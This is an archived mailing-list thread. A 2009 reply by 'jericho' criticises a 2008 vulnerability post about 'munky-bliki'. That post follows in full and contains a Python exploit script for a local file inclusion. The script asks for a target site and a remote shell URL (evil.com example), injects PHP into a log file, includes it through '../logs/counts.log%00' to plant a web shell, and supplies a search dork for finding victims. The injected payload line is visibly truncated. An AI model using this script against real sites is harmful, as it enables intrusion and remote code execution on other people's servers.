Re: munky-bliki lfi

2009-01-26 Thread security curmudgeon 

On Fri, 15 Aug 2008, r3d.w...@yahoo.com wrote:

(pardon the late reply)

: #!user/bin/python
: # -*- coding: cp1256 -*-
: 
#
:    munky-bliki Lfi
   
: 
#
: # 
  #
: #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
  #
: #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) 
  #
: #Our Site : Http://IRCRASH.COM
  #
: #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) 
  #
: 
#
: # 
  #
: #Script Download : 
http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz

Googling for "munky-bliki" gets nothing but references to this post.

This is not the first 'sourceforge project' that doesn't exist within a 
month of a vulnerability disclosure.

http://sourceforge.net/search/?type_of_search=soft&words=munky-bliki

Search results in projects found for "munky-bliki"
Search Help
Results 1 - 0 of 0 

If you broaden the search for "munky", you get the page intended I think 
though?:

http://sourceforge.net/projects/munky/

But, you fail to specify:  Last Update: Jan 03 2005

So in essence, you are taking 3+ year old software, that was in version 
0.01a, and posting a vulnerability in it. You do not include the official 
project name (mUnky), home page, release date, affected script or anything 
else that would allow someone to easily validate this finding.

: #DORK : "Copyright ? 2004 Dovid Kopel"
  #

No hits on the first page.

How is it that so many posts to Bugtraq/F-D involve software that doesn't 
appear to exist, or be used by anyone reachable by Google?

: 
#
: #   Site : Http://IRCRASH.COM 
  #
: ## TNX GOD 
##

Yet, you can find the time to type in your domain/name at least 4 times in 
this post..

Someone recently pointed out that 'vulnerability disclosures' like this 
may actually be a form of covert broadcast designed to manipulate search 
engines.

Personally, I think any post to Bugtraq should now be screened, and if the 
vendor's home page is not included, drop the post.

How about you spend less time picking 'cool' nicknames, less time 
developing two web sites (ircrash.com, r3dw0rm.ir) and more time posting 
legitimate research that involves less ego.

Thanks!

- jericho

munky-bliki lfi

2008-08-15 Thread r3d . w0rm 
#!user/bin/python

# -*- coding: cp1256 -*-

#

   munky-bliki Lfi  
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#

#

#   
#

#Script Download : 
http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz

#   
#

#DORK : "Copyright © 2004 Dovid Kopel"  
#

#   
#

#

#  [Bug]
#

#   
#

#http://Site/?zone=file.type%00 
#

# [Note]
#

#   
#

#By this exploit u can create a shell on valun site ;)  
#

#   
#

#

#   Site : Http://IRCRASH.COM   
#

## TNX GOD 
##

import httplib,urllib

site=raw_input('Site [Ex www.r3d.com]: ')

path=raw_input('Path [Ex /munky]: ')

shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')

print "[*]Powered by : R3d.W0rm - [EMAIL PROTECTED]"

conn=httplib.HTTPConnection(site)

print "[*]Connected to " + site

print "[*]Sending shell code ..."

conn.request('GET',path + 
"/?zone=');fclose($fp);?>")

print "[*]Running shell code ..."

data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')

print "[*]Shell created"

print "[*]" + site + path + '/r3d.w0rm.php'